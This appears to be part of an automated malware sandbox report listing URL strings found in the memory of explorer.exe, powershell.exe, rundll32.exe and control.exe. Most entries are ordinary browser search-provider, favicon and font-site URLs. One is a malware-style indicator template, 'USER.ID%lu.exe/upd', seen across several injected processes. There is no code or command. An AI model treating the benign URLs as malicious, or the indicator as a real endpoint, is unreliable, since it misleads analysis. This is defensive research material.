Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: rundll32.exe, 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 0000001C.00000002.508878039.0000022180001000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmp String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.de/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.google.si/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp String found in binary or memory: http://www.linternaute.com/favicon.ico
